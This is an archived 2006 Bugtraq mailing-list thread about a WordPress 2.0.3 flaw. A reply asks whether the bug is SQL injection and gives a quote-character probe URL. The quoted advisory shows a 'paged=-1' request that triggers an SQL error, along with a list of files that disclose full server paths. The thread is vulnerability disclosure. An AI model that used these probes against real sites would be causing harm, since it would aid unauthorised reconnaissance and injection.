Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: WordPress 2.0.3 SQL Error and Full Path Disclosure
From: "zck zck" <zckzck () gmail com>
Date: Wed, 12 Jul 2006 10:24:05 +0300

Isn't this actually an SQL Injection rather than information leakage?

Try :
http://localhost/wordpress/index.php?paged=%27

I mean, the error message (this time in English) is:
WordPress database error: [You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right
syntax to use near '-10, 10' at line 1]

It specifically says that "You have an error in your SQL syntax",
which means my input goes into the query...

-----Original Message-----
From: xzerox () linuxmail org [mailto:xzerox () linuxmail org]
Sent: Sunday, July 02, 2006 12:15
To: bugtraq () securityfocus com
Subject: WordPress 2.0.3 SQL Error and Full Path Disclosure

WordPress 2.0.3 SQL Error and Full Path Disclosure
Discovered By zero [Moroccan Security Team]
Software: WordPress 2.0.3
Site : www.wordpress.org

~ SQL Error ~

Example:

http://localhost/wordpress/index.php?paged=-1

Result:

WordPress database error: [Erreur de syntaxe pr?s de '-20, 10' ? la
ligne 1]
SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <=
'2006-06-29 12:46:59' AND (post_status = "publish") AND post_status !=
"attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT -20, 10


~ Full path ~

/wp-settings.php
/wp-admin/admin-footer.php
/wp-admin/admin-functions.php
/wp-admin/edit-form.php
/wp-admin/edit-form-advanced.php
/wp-admin/edit-form-comment.php
/wp-admin/edit-link-form.php
/wp-admin/edit-page-form.php
/wp-admin/menu.php
/wp-admin/menu-header.php
/wp-admin/upgrade-functions.php
/wp-admin/upgrade-schema.php
/wp-admin/import/blogger.php
/wp-admin/import/dotclear.php
/wp-admin/import/livejournal.php
/wp-admin/import/mt.php
/wp-admin/import/rss.php
/wp-admin/import/textpattern.php
/wp-content/plugins/hello.php
/wp-content/plugins/wp-db-backup.php
/wp-content/plugins/akismet/akismet.php
/wp-content/themes/classic/index.php
/wp-content/themes/classic/comments.php
/wp-content/themes/classic/comments- popup.php
/wp-content/themes/classic/footer.php
/wp-content/themes/classic/header.php
/wp-content/themes/classic/sidebar.php
/wp-content/themes/default/index.php
/wp-content/themes/default/404.php
/wp-content/themes/default/archive.php
/wp-content/themes/default/archives.php
/wp-content/themes/default/attachment.php
/wp-content/themes/default/comments-popup.php
/wp-content/themes/default/footer.php
/wp-content/themes/default/functions.php
/wp-content/themes/default/header.php
/wp-content/themes/default/links.php
/wp-content/themes/default/page.php
/wp-content/themes/default/search.php
/wp-content/themes/default/searchform.php
/wp-content/themes/default/sidebar.php
/wp-content/themes/default/single.php
/wp-includes/default-filters.php
/wp-includes/kses.php
/wp-includes/locale.php
/wp-includes/rss-functions.php
/wp-includes/template-loader.php
/wp-includes/vars.php
/wp-includes/wp-db.php


Greetz:

simo64, tahati, net_ghost, dabdoub, simo dreaminfo, iss4m, zerosecure,
hunter, themenotor ...

Contact:

Author: Mourad [ zero ]
Email : xzerox(at)linuxmail(dot)org


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault